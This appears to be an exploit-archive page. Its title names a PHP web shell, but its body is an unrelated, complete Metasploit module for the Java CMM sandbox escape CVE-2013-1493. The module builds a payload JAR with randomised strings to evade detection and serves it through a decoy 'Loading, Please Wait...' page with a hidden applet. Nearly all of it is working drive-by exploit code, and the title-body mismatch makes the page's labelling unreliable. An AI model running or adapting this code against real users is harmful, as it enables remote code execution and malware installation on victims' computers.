STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped under data/exploits/cve-2013-1493
  # and give the entry class a random name.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serve the JAR for *.jar requests, the applet page for the resource root,
  # and redirect anything else to the root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the fixed "metasploit"/"Payload" strings in entry names and contents
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal page that embeds the applet with a random JAR name
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end